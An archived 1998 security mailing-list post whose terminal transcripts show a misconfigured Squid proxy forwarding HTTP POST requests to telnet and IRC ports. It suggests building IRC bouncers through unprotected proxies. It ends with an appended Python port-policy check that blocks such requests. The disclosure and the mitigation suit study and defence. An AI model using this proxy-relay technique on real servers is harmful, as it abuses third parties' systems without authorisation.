On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> > Date: Thu, 08 Oct 1998 08:27:36 +0100
> > From: "Mnemonix" <mnemonixat_private>
> >
> > Firstly it seems that most web-based proxies, not just MS Proxy, are
> > susceptible to this kind of attack. Thanks to Greg Jones and others for
> > doing some testing on this.
>
> HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
> pass them straightforward.

Very untrue. Look at this:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0

VuurWerk Internet Telnet Server (telnet.vuurwerk.nl)
Alle transacties worden gelogged, het gebruik van deze server is alleen
voor klanten van VuurWerk tbv. het onderhoud van hun eigen site.

POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200

login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
  PID TTY STAT  TIME COMMAND
 5896  p6 S     0:00 /bin/login -h p8ur.cistron.nl -p
 5901  p6 S     0:00  \_ -bash
 6175  p6 S     0:00      \_ telnet proxy 8080
 6186  p8 S     0:00 /bin/login -h rotterdam vuurwerk.nl -p
 6190  p8 S     0:00  \_ -bash
 6205  p8 R     0:00      \_ ps xfww
[hardbeat@haarlem hardbeat]$

Haarlem is the shellmachine here, also CNAMEd telnet. The proxy
(Squid/1.1.21) will happily forward me, and telnet works as if there's no
proxy in between.

Another great example:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0
nick Hardbeat2
PING :1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST

I can happily IRC now... imagine how easy it would be to write an IRC
bouncer that uses a proxy. Lots of proxies have NO acl or firewall around
them.

The only thing I have _not_ succeeded in until now is chaining proxies
with GET or POST requests.

Greetz, Peter.

--
'I guess anybody who walks away from a root shell at   : Peter van Dijk
 a nerd party gets what they deserve!' -- BillSF        : peterat_private
finger peterat_private for my public PGP-key
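The mitigation side, as an added example that is not part of the original message: the destination-port policy a proxy should apply to request lines like the ones above, written in Python. It mirrors Squid's Safe_ports / SSL_ports ACLs (acl ... port plus http_access deny !Safe_ports in squid.conf); the port sets, the example.com hosts and the function names are assumptions made here.

```python
import re
from urllib.parse import urlsplit

# Ports GET/POST may be forwarded to.  Assumption: a tight web-only list (Squid's
# default Safe_ports list is longer).  Anything else, including the telnet (23)
# and IRC (6667) targets from the post, is denied.
SAFE_PORTS = {80, 443, 8080}
# Ports CONNECT may open a raw tunnel to: TLS only.
SSL_PORTS = {443}

REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d$")

def destination_port(method, target):
    """Return the TCP port this proxy request would open, or None if unparsable."""
    if method == "CONNECT":
        # CONNECT carries a bare host:port, not a URL
        _host, sep, port = target.rpartition(":")
        return int(port) if sep and port.isdigit() else None
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return None
    try:
        port = parts.port  # raises ValueError on a malformed or out-of-range port
    except ValueError:
        return None
    return port if port is not None else (443 if parts.scheme == "https" else 80)

def proxy_decision(request_line):
    """Apply the Safe_ports / SSL_ports policy to one request line: 'allow' or 'deny'."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return "deny"
    port = destination_port(m.group("method"), m.group("target"))
    if port is None:
        return "deny"
    allowed = SSL_PORTS if m.group("method") == "CONNECT" else SAFE_PORTS
    return "allow" if port in allowed else "deny"

# Constructed sample: the two request lines from the post plus ordinary web traffic.
SAMPLE_REQUESTS = [
    "POST http://telnet:23/ HTTP/1.0",
    "POST http://irc.pi.net:6667/ HTTP/1.0",
    "GET http://www.example.com/ HTTP/1.0",
    "CONNECT www.example.com:443 HTTP/1.0",
    "CONNECT telnet.example.com:23 HTTP/1.0",
]

def audit(requests=SAMPLE_REQUESTS):
    """Map each request line to the verdict the proxy should return."""
    return {r: proxy_decision(r) for r in requests}
```

Running audit() over the sample gives deny for both request lines from the post and for the CONNECT to port 23, and allow only for the web and TLS targets.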
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:19:40 PDT